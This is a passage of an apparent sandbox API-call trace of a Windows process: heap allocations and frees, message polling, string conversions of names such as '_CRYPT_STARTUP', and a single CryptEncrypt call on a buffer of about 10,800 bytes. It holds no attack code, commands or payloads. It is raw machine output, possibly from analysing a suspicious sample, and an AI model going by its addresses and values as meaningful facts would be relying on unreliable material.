0x2e511a8 [0231.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0231.783] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0231.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0231.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0231.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0231.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0231.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0231.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0231.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0231.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0231.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0231.784] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0231.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0231.784] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0231.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0231.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0231.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0231.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0231.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0231.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0231.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0231.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0231.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0231.784] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0231.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0231.784] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0231.784] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0231.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0231.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0231.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0231.785] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0231.785] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0231.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0231.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0231.785] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0231.785] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0231.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0231.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0231.785] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0231.785] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0231.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0231.785] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0231.785] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0231.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0231.785] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0231.785] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0231.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0231.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0231.786] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.786] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0231.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0231.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0231.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0231.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0231.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0231.786] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0231.786] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0231.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0231.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0231.786] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0231.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0231.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0231.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0231.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0231.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0231.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51328 [0231.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51328, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0231.787] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x2a33, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x2a38) returned 1 [0231.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0231.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0231.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0231.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0231.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0231.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0231.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0231.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0231.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0231.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0231.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0231.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0231.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0231.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0231.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0231.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0231.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0231.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0231.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0231.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0231.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0231.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0231.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0231.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0231.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0231.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0231.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0231.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0231.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0231.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0231.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0231.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0231.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0231.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0231.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0231.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0231.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0231.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0231.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0231.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0231.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0231.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0231.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0231.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0231.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0231.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0231.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0231.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0231.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0231.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0231.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0231.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0231.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0231.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0231.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0231.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0231.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0231.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0231.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0231.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0231.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0231.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0231.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0231.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0231.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0231.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0231.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0231.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0231.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0231.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0231.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0231.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0231.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0231.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0231.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0231.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0231.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0231.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0231.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0231.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0231.791] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0231.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0231.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0231.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0231.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0231.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0231.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0231.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0231.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0231.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0231.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0231.791] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0231.791] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0231.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0231.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0231.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0231.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0231.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0231.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0231.792] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0231.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0231.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0231.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0231.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0231.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0231.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0231.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0231.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0231.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0231.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0231.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0231.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0231.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0231.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0231.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0231.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0231.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0231.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0231.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0231.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0231.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0231.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0231.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0231.792] CharLowerBuffW (in: lpsz="byte[10808]", cchLength=0xb | out: lpsz="byte[10808]") returned 0xb [0231.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0231.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0231.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0231.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0231.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0231.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0231.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0231.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0231.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0231.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0231.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 